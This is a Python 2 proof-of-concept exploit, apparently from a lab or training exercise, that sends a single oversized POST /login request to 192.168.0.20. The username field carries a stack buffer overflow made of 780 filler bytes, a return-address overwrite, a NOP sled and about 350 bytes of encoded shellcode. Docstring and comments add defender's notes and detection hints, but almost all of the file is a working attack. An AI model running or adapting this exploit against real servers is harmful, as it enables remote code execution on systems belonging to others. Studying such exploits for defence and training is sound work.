#!/usr/bin/python
"""Python 2 proof-of-concept that sends one oversized ``POST /login`` request.

The script builds a ``username=...&password=A`` form body whose ``username``
value is 780 filler bytes, a 4-byte return-address overwrite, a 4-byte gap,
a 10-byte NOP sled and a block of opaque binary machine code; wraps it in
hand-written HTTP/1.1 headers; and sends it once over a plain TCP socket to
192.168.0.20:80.  Python 2 only (``print`` statements; ``str`` is used as a
byte buffer).

Defender's notes, limited to what this file shows:
  * The connect target and the ``Host``/``Referer`` headers all name the same
    private (RFC 1918) address.
  * The ``username`` field is roughly 1.1 KB and contains non-printable
    bytes; a form-encoded login of that shape is a straightforward
    detection rule at a proxy, WAF or IDS.
  * ``Connection: close`` plus a single ``send`` means exactly one request
    per run; nothing is read back from the server.
"""
import socket
try:
    print "\nSending evil buffer..."
    # Opaque payload: 23 lines of 15 escaped bytes plus a 6-byte tail
    # (about 350 bytes).  What it does cannot be determined from this file.
    # NOTE(review): the early bytes ``\xd9\x74\x24\xf4`` resemble an
    # fnstenv-based GetPC stub common to encoded payloads - unconfirmed;
    # at most a signature hint for detection.
    shellcode = ("\xda\xd6\xd9\x74\x24\xf4\xb8\xb7\x91\x6c\x1b\x5b\x31\xc9\xb1"
    "\x52\x83\xeb\xfc\x31\x43\x13\x03\xf4\x82\x8e\xee\x06\x4c\xcc"
    "\x11\xf6\x8d\xb1\x98\x13\xbc\xf1\xff\x50\xef\xc1\x74\x34\x1c"
    "\xa9\xd9\xac\x97\xdf\xf5\xc3\x10\x55\x20\xea\xa1\xc6\x10\x6d"
    "\x22\x15\x45\x4d\x1b\xd6\x98\x8c\x5c\x0b\x50\xdc\x35\x47\xc7"
    "\xf0\x32\x1d\xd4\x7b\x08\xb3\x5c\x98\xd9\xb2\x4d\x0f\x51\xed"
    "\x4d\xae\xb6\x85\xc7\xa8\xdb\xa0\x9e\x43\x2f\x5e\x21\x85\x61"
    "\x9f\x8e\xe8\x4d\x52\xce\x2d\x69\x8d\xa5\x47\x89\x30\xbe\x9c"
    "\xf3\xee\x4b\x06\x53\x64\xeb\xe2\x65\xa9\x6a\x61\x69\x06\xf8"
    "\x2d\x6e\x99\x2d\x46\x8a\x12\xd0\x88\x1a\x60\xf7\x0c\x46\x32"
    "\x96\x15\x22\x95\xa7\x45\x8d\x4a\x02\x0e\x20\x9e\x3f\x4d\x2d"
    "\x53\x72\x6d\xad\xfb\x05\x1e\x9f\xa4\xbd\x88\x93\x2d\x18\x4f"
    "\xd3\x07\xdc\xdf\x2a\xa8\x1d\xf6\xe8\xfc\x4d\x60\xd8\x7c\x06"
    "\x70\xe5\xa8\x89\x20\x49\x03\x6a\x90\x29\xf3\x02\xfa\xa5\x2c"
    "\x32\x05\x6c\x45\xd9\xfc\xe7\xaa\xb6\xfe\xeb\x42\xc5\xfe\x12"
    "\x28\x40\x18\x7e\x5e\x05\xb3\x17\xc7\x0c\x4f\x89\x08\x9b\x2a"
    "\x89\x83\x28\xcb\x44\x64\x44\xdf\x31\x84\x13\xbd\x94\x9b\x89"
    "\xa9\x7b\x09\x56\x29\xf5\x32\xc1\x7e\x52\x84\x18\xea\x4e\xbf"
    "\xb2\x08\x93\x59\xfc\x88\x48\x9a\x03\x11\x1c\xa6\x27\x01\xd8"
    "\x27\x6c\x75\xb4\x71\x3a\x23\x72\x28\x8c\x9d\x2c\x87\x46\x49"
    "\xa8\xeb\x58\x0f\xb5\x21\x2f\xef\x04\x9c\x76\x10\xa8\x48\x7f"
    "\x69\xd4\xe8\x80\xa0\x5c\x08\x63\x60\xa9\xa1\x3a\xe1\x10\xac"
    "\xbc\xdc\x57\xc9\x3e\xd4\x27\x2e\x5e\x9d\x22\x6a\xd8\x4e\x5f"
    "\xe3\x8d\x70\xcc\x04\x84")
    # 780 bytes of padding up to the overwritten return address.
    filler = "A" * 780
    # The 4 bytes that land on the saved return address; presumably the
    # little-endian address 0x10090c83 - not verifiable from this file.
    eip = "\x83\x0c\x09\x10"
    # 4 throw-away bytes between the return address and the NOP sled.
    offset = "C" * 4
    nops = "\x90" * 10
    # Layout: 780 filler + 4 eip + 4 gap + 10 NOPs + payload, about 1.1 KB.
    inputBuffer = filler + eip + offset + nops + shellcode
    # No URL-encoding is applied, so the binary bytes go on the wire raw
    # inside an application/x-www-form-urlencoded body.
    content = "username="+inputBuffer+"&password=A"
    #-- Recreate the HTTP headers as seen from Wireshark --#
    # NOTE: ``buffer`` shadows the Python 2 builtin of the same name.
    buffer = "POST /login HTTP/1.1\r\n"
    buffer += "Host: 192.168.0.20\r\n"
    buffer += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
    buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
    buffer += "Accept-Language: en-US,en;q=0.5\r\n"
    # Encoding not in training
    buffer += "Accept-Encoding: gzip, deflate\r\n"
    buffer += "Referer: http://192.168.0.20/login\r\n"
    buffer += "Content-Type: application/x-www-form-urlencoded\r\n"
    # Content-Length is computed from the body, so it stays accurate if the
    # payload above changes length.
    buffer += "Content-Length: " + str(len(content)) + "\r\n"
    # The DNT header not in training
    buffer += "DNT: 1\r\n"
    # Connection is closed in training
    #buffer += "Connection: keep-alive\r\n"
    buffer += "Connection: close\r\n"
    # Not included in manual
    buffer += "Upgrade-Insecure-Requests: 1\r\n"
    buffer += "\r\n"
    buffer += content
    # Plain TCP, no TLS; the whole request is handed to one send() call.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.0.20",80))
    # send() may transmit fewer bytes than len(buffer); the return value is
    # not checked, and no response is read before closing.
    s.send(buffer)
    s.close()
    print "\nDone!"
except:
    # Bare except: catches every exception (including KeyboardInterrupt and
    # any NameError/TypeError in the code above), so this message is printed
    # for any failure at all, not only a refused connection.
    print "Could not connect!"